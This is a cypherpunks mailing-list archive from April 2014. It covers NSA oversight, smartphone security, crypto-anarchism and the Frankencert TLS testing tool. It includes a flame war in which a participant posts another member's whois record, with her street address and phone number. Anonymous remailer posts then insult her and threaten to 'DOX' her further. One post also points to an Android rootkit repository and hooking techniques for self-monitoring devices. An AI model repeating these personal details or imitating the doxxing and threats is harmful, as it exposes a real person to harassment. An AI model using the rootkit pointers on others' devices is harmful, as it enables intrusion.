Name: not available Type: text/html Size: 2309 bytes Desc: not available URL: From carimachet at gmail.com Sat Apr 5 00:26:50 2014 From: carimachet at gmail.com (Cari Machet) Date: Sat, 5 Apr 2014 07:26:50 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: dan your just a retaliating competitive little fucking capitalist YOU are whats wrong with the world petty bullshit could probably never admit you are wrong no self critic possible with your kind of psyche and this other shit about mass enslavement and oh we poor little fucks cant do nothing about nothing - have you ever even heard of the fucking enlightenment ya know before then the fucking church was your fucking slave master would you rather go back to that ??? - well a lot of super intelligent people draged humanity out of the death grip of the fucking church and monarchs > died for that shit and were imprisoned for fucking years - obviously we cant count on you fucks for any such activity fucking remotely cant even think for one fucking second On Sat, Apr 5, 2014 at 7:19 AM, Cari Machet wrote: > what a total fuck and completely inaccurate i am not even in the US so > fuck off - totally sick shit dan > > > On Sat, Apr 5, 2014 at 2:44 AM, wrote: > >> >> | You may not believe in scarcity, but I know one thing for a fact. I >> | have a limited amount of food in my refrigerator, and a limited >> | tolerance for strangers in my house. You may not call that "scarcity" >> | but it sure sounds like scarcity to me. So I'll say it again: if I >> | wake up one morning and find you in my house eating my food, you-gonna >> | be in big trouble Lucy. >> >> And return the favor; Cari's kitchen is ostensibly at >> >> % whois Globalrevops.org >> ... 
>> Tech ID:CR106626965 >> Tech Name:Cari machet >> Tech Organization:carimachet >> Tech Street: 3123 vernon blvd >> Tech City:Astoria >> Tech State/Province:New York >> Tech Postal Code:11106 >> Tech Country:US >> Tech Phone:+1.6466526434 >> Tech Phone Ext: >> Tech Fax: >> Tech Fax Ext: >> Tech Email:cari_machet at me.com >> >> > > > -- > Cari Machet > NYC 646-436-7795 > carimachet at gmail.com > AIM carismachet > Syria +963-099 277 3243 > Amman +962 077 636 9407 > Berlin +49 152 11779219 > Reykjavik +354 894 8650 > Twitter: @carimachet > > 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 > > Ruh-roh, this is now necessary: This email is intended only for the > addressee(s) and may contain confidential information. If you are not the > intended recipient, you are hereby notified that any use of this > information, dissemination, distribution, or copying of this email without > permission is strictly prohibited. > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 4791 bytes Desc: not available URL: From carimachet at gmail.com Sat Apr 5 02:49:13 2014 From: carimachet at gmail.com (Cari Machet) Date: Sat, 5 Apr 2014 09:49:13 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: slime likes to group together and create cavities in peoples minds > deep holes none of you apparently have the capacity to actually make any arguments against what i write therefor have to resort to sick tactics like school children mentality how the fuck old are you supposed men? On Sat, Apr 5, 2014 at 9:19 AM, Robert Hettinga wrote: > > On Apr 5, 2014, at 3:26 AM, Cari Machet wrote: > > > capitalist > > Dang. > > Long knives have come out. > > Cheers, > RAH > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1770 bytes Desc: not available URL: From list at sysfu.com Sat Apr 5 10:27:04 2014 From: list at sysfu.com (Seth) Date: Sat, 05 Apr 2014 10:27:04 -0700 Subject: Github Pages now supports SSL In-Reply-To: <533EFC94.4060708@mit.edu> References: <533EFC94.4060708@mit.edu> Message-ID: On Fri, 04 Apr 2014 11:40:20 -0700, yan wrote: > There's even an HTTPS Everywhere rule for it already in case you *only* > want to ever access it over SSL! 
https://www.eff.org/https-everywhere

HTTP Nowhere is also worth checking out. It can be configured to force HTTPS on all sites and connections. I prefer it over HTTPS Everywhere.

https://addons.mozilla.org/en-US/firefox/addon/http-nowhere/

From carimachet at gmail.com Sat Apr 5 05:02:27 2014
From: carimachet at gmail.com (Cari Machet)
Date: Sat, 5 Apr 2014 12:02:27 +0000
Subject: reminder of mays manifesto
Message-ID:

i post this here as a reminder of anarchist models and how they can be utilized in fascist occasions and are anti fascist but also are anti capitalist - anarchist models are found in every sector that i know of ideas of autonomy and horizontality - direct democracy but there is an overwhelming desire of some to subvert these tendencies - look for them in yourself...

++++++++++++++++++++

The Crypto Anarchist Manifesto

Timothy C. May <tcmay at netcom.com>

A specter is haunting the modern world, the specter of crypto anarchy.

Computer technology is on the verge of providing the ability for individuals and groups to communicate and interact with each other in a totally anonymous manner. Two persons may exchange messages, conduct business, and negotiate electronic contracts without ever knowing the True Name, or legal identity, of the other. Interactions over networks will be untraceable, via extensive re-routing of encrypted packets and tamper-proof boxes which implement cryptographic protocols with nearly perfect assurance against any tampering. Reputations will be of central importance, far more important in dealings than even the credit ratings of today. These developments will alter completely the nature of government regulation, the ability to tax and control economic interactions, the ability to keep information secret, and will even alter the nature of trust and reputation.

The technology for this revolution--and it surely will be both a social and economic revolution--has existed in theory for the past decade.
The methods are based upon public-key encryption, zero-knowledge interactive proof systems, and various software protocols for interaction, authentication, and verification. The focus has until now been on academic conferences in Europe and the U.S., conferences monitored closely by the National Security Agency. But only recently have computer networks and personal computers attained sufficient speed to make the ideas practically realizable. And the next ten years will bring enough additional speed to make the ideas economically feasible and essentially unstoppable. High-speed networks, ISDN, tamper-proof boxes, smart cards, satellites, Ku-band transmitters, multi-MIPS personal computers, and encryption chips now under development will be some of the enabling technologies.

The State will of course try to slow or halt the spread of this technology, citing national security concerns, use of the technology by drug dealers and tax evaders, and fears of societal disintegration. Many of these concerns will be valid; crypto anarchy will allow national secrets to be traded freely and will allow illicit and stolen materials to be traded. An anonymous computerized market will even make possible abhorrent markets for assassinations and extortion. Various criminal and foreign elements will be active users of CryptoNet. But this will not halt the spread of crypto anarchy.

Just as the technology of printing altered and reduced the power of medieval guilds and the social power structure, so too will cryptologic methods fundamentally alter the nature of corporations and of government interference in economic transactions. Combined with emerging information markets, crypto anarchy will create a liquid market for any and all material which can be put into words and pictures.
And just as a seemingly minor invention like barbed wire made possible the fencing-off of vast ranches and farms, thus altering forever the concepts of land and property rights in the frontier West, so too will the seemingly minor discovery out of an arcane branch of mathematics come to be the wire clippers which dismantle the barbed wire around intellectual property.

Arise, you have nothing to lose but your barbed wire fences!

-- 
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 5410 bytes
Desc: not available
URL:

From mixmaster at remailer.privacy.at Sat Apr 5 06:47:29 2014
From: mixmaster at remailer.privacy.at (Anonymous Remailer (austria))
Date: Sat, 5 Apr 2014 15:47:29 +0200 (CEST)
Subject: FAKE Indian TROLL ALERT!!(cari machet warning!)
Message-ID: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at>

On Apr 5, 2014, at 3:26 AM, Cari Machet wrote:

> capitalist AND

You BITCH are a thieving Looter. Time to DOX you and turn over all to the passport authorities/NSA!!

FUCK you Cari Machet - fake indian

From mixmaster at remailer.privacy.at Sat Apr 5 06:57:42 2014
From: mixmaster at remailer.privacy.at (Anonymous Remailer (austria))
Date: Sat, 5 Apr 2014 15:57:42 +0200 (CEST)
Subject: FAKE Indian Cari Machet Posts RANT by WELL KNOWN Capitalist TC May..
Message-ID: <497babfff4ac2aa5147f19b389add1ad@remailer.privacy.at>

U have to be the most IGNORANT fake Indian on this list.. TC May is a WELL Known Libertarian Capitalist/Randist.. Cari you are such a fucking soft headed Moron!! what a fucking rube

anon time to post more DOX on Cari Machet!!

From rysiek at hackerspace.pl Sat Apr 5 09:18:24 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Sat, 05 Apr 2014 18:18:24 +0200
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <533EF242.5010604@loom.cc>
Message-ID: <3875575.c0SDfnb8MO@lap>

On Saturday, 5 April 2014 09:49:13 Cari Machet wrote:
> slime likes to group together and create cavities in peoples minds
> deep
> holes
>
> none of you apparently have the capacity to actually make any arguments
> against what i write therefore have to resort to sick tactics like school
> children mentality how the fuck old are you supposed men?

Thank FSM you're not calling people names, comparing them to children and questioning masculinity all around, or I wouldn't know what to think!

-- 
Regards
rysiek

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From rysiek at hackerspace.pl Sat Apr 5 09:20:02 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Sat, 05 Apr 2014 18:20:02 +0200
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140405024449.EF1112280DB@palinka.tinho.net>
Message-ID: <1533024.UFgHooSaP0@lap>

On Saturday, 5 April 2014 05:18:44 Robert Hettinga wrote:
> On Apr 4, 2014, at 10:44 PM, dan at geer.org wrote:
>> Tech ID:CR106626965
>
> I haven’t had this much fun since the hogs ate my little brother, I
> tellyawhut…
>
> *Munches popcorn…*
>
> Cheers,
> RAH

Add a "-66 Comanche" there and watch the fireworks!

-- 
Regards
rysiek

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From coderman at gmail.com Sat Apr 5 20:03:25 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 20:03:25 -0700
Subject: Investigating the Investigators
In-Reply-To: <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com>
References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> <2599717.Sq0aVNU7Id@lap> <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com>
Message-ID:

On Thu, Apr 3, 2014 at 8:53 AM, jim bell wrote:
> ... About all I can say at the moment is that I am very busy, have
> a lot to do..

we still need to meet up for blunts, booze, and key exchange Jim...

the future; it's calling! ;)

From coderman at gmail.com Sat Apr 5 20:07:00 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 20:07:00 -0700
Subject: RAND study on "Markets for Cybercrime Tools and Stolen Data"
In-Reply-To: <533EAC25.8050406@entersection.org>
References: <533EAC25.8050406@entersection.org>
Message-ID:

On Fri, Apr 4, 2014 at 5:57 AM, Gregory Foster wrote:
> ... RAND National Security Research Division (2014) - "Markets for
> Cybercrime Tools and Stolen Data: Hackers' Bazaar" by Lillian Ablon,
> Martin C. Libicki, Andrea A. Golay:
> http://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf

"The harmful effects of black markets on cybersecurity suggest the need for options to suppress such market activity--without which, very little is likely to change."

the intelligence community thanks you for your pervasive inaction and futile efforts to restrain their black market production pipeline!

From grarpamp at gmail.com Sat Apr 5 17:13:34 2014
From: grarpamp at gmail.com (grarpamp)
Date: Sat, 5 Apr 2014 20:13:34 -0400
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To: <20140405180708.GB23433@torproject.org>
References: <533C96AF.2050004@anonymous.coward.posteo.de> <533D79FC.3070703@freitas.net> <533F48CF.6070606@anonymous.coward.posteo.de> <20140405180708.GB23433@torproject.org>
Message-ID:

>> For example, I want to talk to political activists, I would like to
>> discuss with them, no matter if I share their views or not. This could
>> easily make you interesting for certain people. Sometimes just talking
>> to certain people could make you suspicious.
>
> If you are concerned with protecting the social graph of who you are
> communicating with, there is *maybe* exactly one communication system
> that exists today that can protect this information from a dedicated
> adversary with resources on the order of a drug cartel.

Excepting that we're in anti-graph tor-talk forum... Why are people so sure to give primary fear to letting our graph be known? Where are the people screaming that content is the worse leak? Maybe you know a lot of Muslim terrist sympathizers, but are really calling to see about dinner plans, maybe you sell pens to all sorts of specialist doctors, and document services to criminal defense attorneys, condoms to whores, and pagers to drug dealers, wearcams to activists, etc. Contact graphs can usually be dual use and rarely used directly against you. Content is usually single use and is often used against you.

A link to another secure phone voice/msg app, redphone/textsecure...
https://whispersystems.org/

Now if we can just have an android phone app/ROM do encrypted voice (by somehow hooking into the mic/speaker codec/pcm/modem path) over the cell voice network (voice minutes plan, usable everywhere) instead of:
- the wifi-ip network (free, if you are near an AP, which you usually aren't)
- the cell data-ip network (requires a data/ip plan)
then I can see a huge number of people installing that app/ROM.
I don't know of anyone working on this though :(

[The pricing of [un]limited cell minutes/data/sms vs. your usage of same is in some regions more attractive/available without a data plan. Thus making this voice app/ROM more universally useful.]

[You still have to trust the integrated baseband processor, till that hardware gets opened up.]

From coderman at gmail.com Sat Apr 5 20:25:47 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 20:25:47 -0700
Subject: [cryptography] Geoff Stone, Obama's Review Group - Part 2
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID:

On Thu, Apr 3, 2014 at 5:09 AM, John Young wrote:
> The CIA is the principal customer of NSA products outside
> the military...
>
> CIA (long FBI opponents) thought FBI could not cope with inside
> terrorists, using 9/11 as an example, and advocated NSA involvement
> with its much greater technical capability, but more importantly, its
> military-privileged secrecy not susceptible to full congressional
> oversight, courts and FOIA.
>
> The joint CIA-NSA Special Collection Service (SCS) has
> been doing for decades what NSA is now alone accused of doing:
> CIA provided the targets, NSA did the technical collection from
> those global stations identified by xKeyscore (most in embassies
> or nearby).
>
> What is bizarre is how little CIA is mentioned in news furor about
> NSA, as if NSA did its work in isolation from the IC and without
> oversight of the 3 branches.

FBI DITU also playing front-man as of late, it seems.

FBI-DITU + NSA-SSO/TAO + CIA/NSA-SCS - this is a trifecta of fuckery! they're a legislative laundry designed to circumvent any constraints individually by collectively attaining ends via means so offensive they must remain hidden lest "National Security and The Future of our Nation" be at risk...

were i a new age "Citizens for Intelligence Community Oversight" i would pwn all three, and dump the entirety of their operations to darknet.
let the public sort it out...

[exercise for the reader: would it take longer for the world to digest an entire dump than it would the current Snowden-subset processing via reporter privilege?]

> SCS also does burglaries, code snatches, decrypts, doc drops,
> stings, ploys, blackmail, the panoply of CIA operations. The increased
> civilian target panoply bestowed upon NSA came from CIA demands
> channeled through ODNI.
>
> Reviewing what little has been released of the Snowden documents
> they are quite similar to what SCS has been doing with the addition
> of the US as target. FISA had to be rejiggered for the US domain.

the use of foreign, military IC tools against domestic targets is where many interesting stories lie. you think yesterday's battlefield exploits don't become today's domestic lawful access? epic lulz!

what fucking tatters they've left our "Constitutional Rights"... [which should be afforded to all citizens of Earth, my overseas peers fucked harder, longer, in no offensive a manner]

> NSA's recent attempt to slough off Cybercom and return to
> its military mission, has been rejected by the civilian overseers
> following CIA guidance and fear-mongering of civilians, especially
> those inside the US. The last thing CIA and its supporters want
> is a revelation of its manipulation of civilian leaders institutionalized
> by the 1947 National Security Act (also opposed by the military).

indeed. IC suffering a deluge of undue oversight and sunlight. are you crazy POTUS, you want more potential visibility? get tha fuck back in yer hole, servant...
From jamesdbell9 at yahoo.com Sat Apr 5 20:28:24 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Sat, 5 Apr 2014 20:28:24 -0700 (PDT)
Subject: Investigating the Investigators
In-Reply-To:
References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> <2599717.Sq0aVNU7Id@lap> <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com>
Message-ID: <1396754904.7088.YahooMailNeo@web126203.mail.ne1.yahoo.com>

Let's put it a few months into the future so that everybody can schedule. Mid-July, perhaps?

     Jim Bell

________________________________
From: coderman
To: jim bell
Cc: rysiek ; "cypherpunks at cpunks.org"
Sent: Saturday, April 5, 2014 8:03 PM
Subject: Re: Investigating the Investigators

On Thu, Apr 3, 2014 at 8:53 AM, jim bell wrote:
> ... About all I can say at the moment is that I am very busy, have
> a lot to do..

we still need to meet up for blunts, booze, and key exchange Jim...

the future; it's calling! ;)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1973 bytes
Desc: not available
URL:

From coderman at gmail.com Sat Apr 5 20:30:53 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 20:30:53 -0700
Subject: Anarchism and Capitalism [was: reminder of mays manifesto]
Message-ID:

On Sat, Apr 5, 2014 at 5:02 AM, Cari Machet wrote:
> i post this here as a reminder of anarchist models and how they can be
> utilized in fascist occasions and are anti fascist but also are anti
> capitalist

anarchistic theories as anti-capitalist? the best markets are fully decentralized, with pervasive information: anarchistic to their core!

the fact that nearly all systems of capitalist claim in current day are absurd perversion of an ideal does not imply the concept itself is invalid...
best regards,

From coderman at gmail.com Sat Apr 5 20:52:52 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 20:52:52 -0700
Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
Message-ID:

the entire "Legislative Laundry of FBI+CIA+NSA+DIA Collusion" and their enablers need to die in a fire. sole focus on NSA a smoke screen...

On Wed, Apr 2, 2014 at 7:56 PM, wrote:
>...
> From the outset, I approached my responsibilities as a member
> of the Review Group with great skepticism about the NSA. I am
> a long-time civil libertarian, a member of the National Advisory
> Council of the ACLU, and a former Chair of the Board of the
> American Constitution Society. To say I was skeptical about
> the NSA is, in truth, an understatement.
>
> I came away from my work on the Review Group with a view of
> the NSA that I found quite surprising. Not only did I find
> that the NSA had helped to thwart numerous terrorist plots
> against the United States and its allies in the years since
> 9/11, but I also found that it is an organization that operates
> with a high degree of integrity and a deep commitment to the
> rule of law.

my greatest fears are not about what the NSA has intended, but what the NSA has built with the best intentions, which in turn will fall into malicious hands. history tells us this is but a matter of time.

as an attacker, i see the capabilities so developed as nothing short of abhorrent. they should not exist, they should not be pursued. they are means that are unethical no matter the end.

> ... The Review Group found that many of
> the programs undertaken by the NSA were highly problematic and
> much in need of reform.
> But the responsibility for directing
> the NSA to carry out those programs rests not with the NSA,
> but with the Executive Branch, the Congress, and the Foreign
> Intelligence Surveillance Court, which authorized those programs

see also, the "Legislative Laundry of FBI+CIA+NSA+DIA Collusion"

to focus on NSA is to miss the underlying patterns of control at work...

> It gradually became apparent to me that in the months after
> Edward Snowden began releasing information about the government's
> foreign intelligence surveillance activities, the NSA was being
> severely -- and unfairly -- demonized by its critics.

conflating NSA as an institutional entity, NSA tasking, and NSA staff.

NSA tasking is bad and should feel bad.

NSA institutional culture is less bad, yet needs correction.

NSA employees individually? they have been deceived and demoralized themselves! this group is the least culpable, in my eyes.

i have friends in IC and i can tell you they feel no less sucker punched by these revelations. make no mistake, they've been similarly misled by "legal weasel words" and "exceptionally compartmentalized deceptions", etc.

there are heads at the top that need severing from bodies. [wait, they've admitted that is too kind. life support in keep-away for centuries!!!!]

> Of course, "I was only following orders" is not always an
> excuse. But in no instance was the NSA implementing a program
> that was so clearly illegal or unconstitutional that it would
> have been justified in refusing to perform the functions
> assigned to it by Congress, the President, and the Judiciary.

see also "compartmentalization". i have a story to tell here about physical encryption systems in surveillance satellites. you think NSA staff even knew what they were working on? that's the exception, rather than the rule.
your "big data science to optimize in memory representation of sparse lattices" is just an innocuous cog in a machine cracking weak crypto to target drones to metadata targets that resulted in the loss of innocent life in some third world backwater you've never given thought to.

[and tomorrow's domestic oppression of opportunity unleashed through the best intentions. if only we knew back then... if only...]

> Although the Review Group found that many of those programs
> need serious re-examination and reform, none of them was so
> clearly unlawful that it would have been appropriate for the
> NSA to refuse to fulfill its responsibilities.

you think that's an accident? this is precision engineering! see also, the "Legislative Laundry of FBI+CIA+NSA+DIA Collusion"

> Moreover, to the NSA's credit, it was always willing to engage
> the Review Group in serious and candid discussions about the
> merits of its programs, their deficiencies, and the ways in
> which those programs could be improved. Unlike some other
> entities in the intelligence community and in Congress, the
> leaders of the NSA were not reflexively defensive, but were
> forthright, engaged, and open to often sharp questions about
> the nature and implementation of its programs.

this means they're the least useful to question. when does CIA/DIA scrutiny begin?

> In short, I found, to my surprise, that the NSA deserves the
> respect and appreciation of the American people. But it should
> never, ever, be trusted.

NSA used like a tool, just like the sysadmin and cryptographer "tools" they exploited and used so effectively...

From coderman at gmail.com Sat Apr 5 21:30:25 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 21:30:25 -0700
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To: <533D33AD.3040509@sent.at>
References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at>
Message-ID:

On Thu, Apr 3, 2014 at 3:10 AM, wrote:
> ...
> That made me wonder. What are the risks involved using a Tails PC and
> getting online through a 3G clean Android smartphone with no apps
> installed or Google accounts activated tethered through USB?

as long as you assume the 3G link is as trustworthy as your neighborhood open wifi, you're fine. i can tell you that i've had malware sent down a 3G pipe to a tethered target just as you might expect on any other hostile network.

incidentally, this tethered mode is how i prefer to communicate:

1. a front-end sacrificial/signalling device to indicate a threat level and carry traffic. (hotspot puck, 3G phone, CPE router, etc.)

2. a packet inspecting host to passively monitor for anomalies and respond to emergencies. (emergency zeroisation+filtering)

3. the actual communicating device containing keys and terminating sessions. further hardened by defense in depth.

for any decent attacker, mobile platforms are just fucked. sorry! this is true until you can implement an entire isolated SDR stack; even opaque wifi blobs are fail.

[i've stated my preference for various software defined radio setups before, omitted.]

> Or better yet: who can see what?
>
> I read the hardware is rigged (Samsungs), you wrote about the software
> being rigged (the ability to remotely install apps), and surely the
> phone company can do a lot of tricks from the early days of GSM. So is
> it crazy to route Tor traffic through such a gateway?

it's fine to route traffic over such a device as long as you assume the attacker is also watching and able to inject into your traffic over said gateway :)

this means you run Tor on a different device, not the phone itself.
last but not least, regarding the "Mission Impossible: Hardening Android for Security and Privacy"
https://blog.torproject.org/blog/mission-impossible-hardening-android-security-and-privacy

i have found the following techniques useful in the past against advanced attackers:

0.) rootkit Android kernel to trap and notify|block syscall use by user-id and process-id. anomalous calls by privileged processes or users are a great signal of compromise.

1.) monkey patch Android API in every dalvik runtime for specific calls of interest that should not be granted. this caught the "Android Master key" vuln in practice as an updated app was behaving way out of permission and expected profile.

2.) deploy camouflage guacamole to feign vulnerability to various techniques and then use exploit attempts to signal presence of an adversary of identified capabilities.

doing the above on a reference Nexus 7 platform left as exercise for the reader, *grin*

best regards,

From coderman at gmail.com Sat Apr 5 22:05:47 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 22:05:47 -0700
Subject: DILKE-ALLEN Award
Message-ID:

what is the history?

From coderman at gmail.com Sat Apr 5 23:33:54 2014
From: coderman at gmail.com (coderman)
Date: Sat, 5 Apr 2014 23:33:54 -0700
Subject: [tor-talk] Linux kernel transproxy packet leak (w/ repro case + workaround)
In-Reply-To: <533C4FFE.2050702@openmailbox.org>
References: <20140328194312.GD31390@torproject.org> <533AC785.9010005@openmailbox.org> <533C4FFE.2050702@openmailbox.org>
Message-ID:

On Wed, Apr 2, 2014 at 10:59 AM, Rusty Bird wrote:
> ...
> Maybe it can be boiled down to this: When redirecting *and* filtering,
> the filtering should be done in OUTPUT (instead of INPUT), ...

this is where defense in depth at the multiple-virtual machine / routing layer fails safe in ways that a single / monolithic Tor setup cannot, when applied with care.

what i mean by "applied with care" is that forwarding through Tor only is the default.
Anything unexpected / unsupported gets the bit bucket. the best target is actually TARPIT, not DROP, but that's another discussion...

[this advice to default drop and isolate at routing level applies to Tails, Whonix, Qubes TorVM, and whoever else allows a transparent proxy model, IMHO]

best regards,

From coderman at gmail.com Sun Apr 6 01:48:29 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 01:48:29 -0700
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To:
References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at>
Message-ID:

On Sun, Apr 6, 2014 at 1:26 AM, grarpamp wrote:
> ...
> SDR... fun gear for btc miners to spend their coin on....

the old GPUs that used to pool mine before the ASIC takeover are great for searching key spaces and permuted dictionaries, but seems the SDR adoption is lacking.

traditionally, SDR is narrowband focused, low overhead more than amenable to CPU cycles. very wide band, very high rate, multi-radio SDR setups are just now coming into independent exploration; perhaps then old GPUs can be brought back to utility! *grin*

> Related reading,
> a Nexus 5 service manual search string: 173744848-LG-D821.pdf

my favorite odd band technical input is still the barcode scanners from decades past which would interpret scanned input and escapes same as keyboard console entry.

factory reset SMS type attacks have been ongoing for so many years, the same mistakes over and over. back then, you could claim innocent times. today, there is just no excuse.

last but not least, regarding compromising your own devices to know when someone might be trying to compromise your devices, the following may be useful hints in the proper direction. as always, best to build your own :)

https://github.com/hiteshd/Android-Rootkit

search: LD_PRELOAD hooking

http://www.cydiasubstrate.com/inject/android/ / http://www.cydiasubstrate.com/inject/dalvik/

your mileage may vary...
best regards,

From coderman at gmail.com Sun Apr 6 03:04:57 2014
From: coderman at gmail.com (coderman)
Date: Sun, 6 Apr 2014 03:04:57 -0700
Subject: Frankencert - Adversarial Testing of Certificate Validation in SSL/TLS Implementations
Message-ID:

https://github.com/sumanj/frankencert

Frankencert - Adversarial Testing of Certificate Validation in SSL/TLS Implementations

What are frankencerts?

Frankencerts are specially crafted SSL certificates for testing certificate validation code in SSL/TLS implementations. The technique is described in detail in the 2014 IEEE Symposium on Security and Privacy (Oakland) paper - Using Frankencerts for Automated Adversarial Testing of Certificate Validation in SSL/TLS Implementations by Chad Brubaker, Suman Jana, Baishakhi Ray, Sarfraz Khurshid, and Vitaly Shmatikov.

Why is frankencert generator useful?

Frankencert generator is essentially a smart fuzzer for testing SSL/TLS certificate validation code. If you are a developer who is implementing any sort of SSL/TLS certificate validation code (either as part of an SSL/TLS library or an application), you can use the frankencert generator to auto-generate different test certificates involving complex corner cases. We have successfully used frankencerts to find serious vulnerabilities in GnuTLS, PolarSSL, CyaSSL, and MatrixSSL as described in our Oakland 2014 paper. We also found several discrepancies between how different SSL/TLS implementations report errors back to the user. For example, when presented with an expired, self-signed certificate, NSS, Chrome on Linux, and Safari report that the certificate has expired but not that the issuer is invalid.

How do frankencerts work?

The basic idea of frankencerts is to take a bunch of certificates as seeds and use random mutations on different fields and extensions to create new test certificates (frankencerts).
Using frankencerts as server-side inputs into an SSL/TLS handshake can help systematically test correctness of the certificate validation code.

Installation and Usage

Install OpenSSL libraries and utilities if you don't have them already.

The frankencert generator needs a modified version of PyOpenSSL. We have included the source for our modified version of PyOpenSSL. You will need to install it in order to use the frankencert generator. First, uninstall any other version of PyOpenSSL that you may have installed on your computer. Go to the pyOpenSSL-0.13 directory and build/install PyOpenSSL by issuing sudo python setup.py install.

Once you have the patched pyOpenSSL set up, to generate frankencerts, use the franken_generate.py script:

python franken_generate.py seed_certs_dir ca_cert output_dir count [config_file]

The arguments are explained below.

seed_certs_dir: Frankencert generator needs a set of seed certificates. Any SSL cert in PEM format can act as a seed cert. seed_certs_dir can be any directory containing the seed certs stored as PEM files. You can either use tools like ZMap (https://zmap.io/) to collect SSL seed certificates, or use some of the SSL certs available from https://www.eff.org/observatory. Please note that these are not our tools and repositories - you may want to contact their respective developers and maintainers to ensure that your usage of the certificates they collected is compatible with the intended purpose. You do not need access to the corresponding private keys to use the certs as seeds. For your convenience, we have included a tarball containing around 1000 seed certificates in utils/sample_seed_certs.tar.gz.

ca_cert: You will also need to create a self-signed CA certificate to sign the frankencerts. You can either use the included sample CA certificate utils/rootCA_key_cert.pem or use the utils/create_new_ca.sh script to create your own root CA.
For any root CA that you use for frankencert generation, make sure that your SSL certificate validation code treats its certificate as a trusted root certificate. VERY IMPORTANT: this root certificate should be trusted ONLY during testing. If you accidentally or intentionally deploy SSL/TLS with this certificate still among the trusted root certificates, your SSL/TLS connections may be vulnerable to server impersonation and man-in-the-middle attacks. Be sure to REMOVE this certificate from your trusted root certificates once the testing is finished.

output_dir: It will contain the generated frankencerts. The frankencerts will be named as frankencert-.pem.

count: Number of frankencerts to be generated.

config_file: An optional argument to tune the frankencert generation process. Take a look at the utils/sample_franken.conf for a sample config file.

To test your SSL/TLS client with the generated frankencerts, you should use the utils/test_ssl_server.py script to set up an SSL server that can present the generated frankencerts as part of the SSL handshake.

Project structure

The frankengen directory contains the frankencert generator code

Our patched version of pyOpenSSL is inside pyOpenSSL-0.13 directory

Several useful tools are included in utils

cert_print.py: a tool for printing frankencerts. It requires OpenSSL to be installed and present in the path.

rootCA_key_cert.pem: private key and self-signed cert of a sample CA that can be used for signing frankencerts.

